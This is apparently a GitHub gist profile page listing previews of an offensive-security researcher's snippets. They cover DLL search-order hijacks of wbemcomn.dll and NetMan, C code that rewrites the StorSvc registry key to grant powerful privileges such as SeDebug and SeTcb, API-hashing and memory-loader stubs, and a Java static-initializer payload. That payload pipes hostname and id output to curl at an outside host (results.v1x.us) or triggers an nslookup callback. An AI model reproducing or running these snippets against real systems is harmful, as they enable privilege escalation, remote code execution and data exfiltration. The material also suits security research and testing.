Skip to content

Instantly share code, notes, and snippets.

View v1stra's full-sized avatar

v1stra

9 followers · 48 following
View GitHub Profile
@v1stra
v1stra / wbemcomn.md
Last active December 12, 2024 13:43
wbemcomn.dll hijack

wbemcomn.dll

wbemcomn.dll is naturally found in C:\windows\system32, however, some WMI serves run with a working directory of C:\windows\system32\wbem. This means that DLLs might load with a search order hijack by first looking in the working directory.

This DLL hijack appears to at least effect explorer.exe and the following services:

  • WMI
  • Windows Update
  • WMI Performance Adapter
  • WSL
@v1stra
v1stra / netmantrigger.c
Last active October 11, 2024 13:36
Trigger NetMan to load wlanhlp.dll or wlanapi.dll in native C
/* https://itm4n.github.io/windows-server-netman-dll-hijacking/ */
#include <windows.h>
#include <netcon.h>
#include <stdio.h>
/* https://github.com/reactos/reactos/blob/master/sdk/lib/uuid/otherguids.c */
DEFINE_GUID(IID_INetConnectionManager, 0xC08956A2,0x1CD3,0x11D1,0xB1,0xC5,0x00,0x80,0x5F,0xC1,0x27,0x0E);
DEFINE_GUID(CLSID_ConnectionManager, 0xBA126AD1,0x2166,0x11D1,0xB1,0xD0,0x00,0x80,0x5F,0xC1,0x27,0x0E);
void go() {
@v1stra
v1stra / asm_get_ntdll.c
Created June 27, 2024 17:27
asm_get_ntdll.c
/* tcc asm_get_ntdll.c */
#include <Windows.h>
#include <stdio.h>
void * get_ntdll() {
unsigned long long ret;
__asm__ (
"
@v1stra
v1stra / Stuff.c
Last active September 29, 2023 13:50
Stuff
/* Overwrites the privileges for the service in the registry */
BOOL AddPrivilegeToStorSvc() {
HKEY hKey;
LONG lResult;
TCHAR * szValue = TEXT("SeTcbPrivilege\0SeLoadDriverPrivilege\0SeBackupPrivilege\0SeRestorePrivilege\0SeSystemEnvironmentPrivilege\0SeManageVolumePrivilege\0SeTakeOwnershipPrivilege\0SeDebugPrivilege\0SeAssignPrimaryTokenPrivilege\0\0");
// Open the key
lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SYSTEM\\CurrentControlSet\\Services\\StorSvc"), 0, KEY_READ | KEY_SET_VALUE, &hKey);
@v1stra
v1stra / lol.cs
Created June 30, 2023 17:12
lol
using System;
using System.IO;
using System.Runtime.InteropServices;
class Program
{
// Values for PAGE_ constants can be found in the Windows SDK
const uint PAGE_EXECUTE_READ = 0x20;
const uint PAGE_EXECUTE_READWRITE = 0x40;
@v1stra
v1stra / djb2.asm
Last active January 21, 2023 13:26
DJB2 Hash in assembly
.code
asm_hash PROC
push rbp
mov rbp, rsp
mov qword ptr [rbp - 28h], rdi
mov qword ptr [rbp - 30h], rsi
mov qword ptr [rbp - 10h], 1505h
mov rax, qword ptr [rbp - 28h]
mov qword ptr [rbp - 8h], rcx
@v1stra
v1stra / HashLookup.c
Created December 10, 2022 13:27
#include <stdio.h>
#include <Windows.h>
// pe_get_function_by_hash function: takes a pointer to a DLL mapped to memory, and a djb2 hash value of a function.
// It then searches the DLL's export table, hashing the value of the strings in the table, and then returns
// the address to that function.
PVOID pe_get_function_by_hash(PVOID dll, ULONG hashValue)
{
@v1stra
v1stra / decode_uac.cs
Created February 17, 2022 16:45
using System;
class Program {
public enum test : int {
SCRIPT = 0x00000001,
ACCOUNTDISABLE = 0x00000002,
HOMEDIR_REQUIRED = 0x00000008,
LOCKOUT = 0x00000010,
PASSWD_NOTREQD = 0x00000020,
PASSWD_CANT_CHANGE = 0x00000040,
@v1stra
v1stra / Exec.java
Last active December 15, 2021 12:42
Exec
public class Exec {
static {
try {
boolean isWindows = System.getProperty("os.name").toLowerCase().startsWith("windows");
if (isWindows) {
String[] cmd = {"cmd.exe", "/C", "nslookup triggered-rce.windows.v1x.us"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();
} else {
String[] cmd = {"bash", "-c", "(hostname && echo && id) | curl http://results.v1x.us -d '@-'"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();